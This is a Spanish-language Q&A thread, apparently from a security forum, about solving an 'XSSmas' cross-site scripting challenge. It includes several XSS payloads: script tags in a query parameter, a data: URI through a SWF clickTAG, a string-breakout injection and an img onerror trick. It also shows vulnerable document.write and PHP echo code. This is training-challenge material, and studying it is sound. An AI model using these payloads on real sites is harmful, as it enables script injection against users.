¿Cómo se puede resolver este desafío xss? [cerrado]

Question

¿Cómo se puede resolver este desafío xss? [cerrado]

#1 de schroeder (3 votos)
#2 de Adi (1 votos)
#3 de n0-clues (0 votos)

0

Encontré esto: enlace

Y hasta ahora mis soluciones fueron:

1.http://research.insecurelabs.org/xssmas/search.php?query=<script>alert(0)</script>
2. http://research.insecurelabs.org/xssmas/xssmas.swf?clickTAG=data:text/html,<script>alert(0)</script>

pero parece que hay cinco soluciones. ¿Puede alguien ayudarme? Estoy tratando de aprender más sobre XSS. gracias

UPDATED:

I know that two other solutions are related to this:
1.
<script>
var n = '';
if (n != '') {
    $(function() {
        $("h1").html("Merry XSSmas, " + unescape(n) + "!");
    });
}
</script>

2.


<script>
<!-- Analytics: no change below this line -->
document.write('<img src="analytics?url=">');
</script>

Update solved no2:

http://research.insecurelabs.org/xssmas/?url=maxa"><fake></script><script>alert(0)</script>

xss

pregunta Daniel 28.12.2012 - 00:15

fuente

3 respuestas

Lea otras preguntas en las etiquetas xss

¿Herramientas dinámicas para detectar vulnerabilidades en aplicaciones de software escritas en c? ¿Está bien conceder permiso para IUSR_ a cmd.exe?

score 3 · Answer 1

3

Si está tratando de aprender, entonces pedir que otros respondan la pregunta por usted parece contraproducente.

Consulte cheatsheets y otro material para solucionarlo todo.

respondido por el schroeder 28.12.2012 - 01:01

fuente

score 1 · Answer 2

Si bien estoy totalmente de acuerdo con todos los que dijeron que, dado que esto es un desafío y usted debería resolverlo por su cuenta, debo decir que este es, después de todo, un sitio de preguntas y respuestas. Usted ha hecho una pregunta y, si puedo, la responderé. Lo que hagas con esa respuesta es tu propia responsabilidad.

Dicho esto, te recomiendo que solo sigas leyendo si hiciste un gran esfuerzo y no pudiste encontrar una respuesta.

Después de algunos fuzzing encontré que hay algo interesante con research.insecurelabs.org/xssmas/index/analytics , parece que algo le pasó ( analytics?SOMETHING ) se escribe aquí document.write('<img src="analytics?url=SOMETHING">');

Probar con .../xssmas/index/analytics?<script>alert(0)</script> no produjo ningún resultado, así que decidí probar el clásico onerror :

.../xssmas/index/analytics?<img src="giveMe404" onerror="alert(0)">

Y funcionó.

¡Buena suerte encontrando el resto!

score 0 · Answer 3

Probar con .../xssmas/index/analytics?<script>alert(0)</script> no produjo ningún resultado, así que decidí probar el clásico onerror:

Deberías imaginarte cómo se ve el script de la página del servidor ... podría ser algo así:

<script>  document.write('<img src="analytics?url=<?php echo $variable; ?>">'); </script>

Su ejemplo funcionaría pero necesita "borrar" el resto del código JS innecesario. Quiero decir: ">');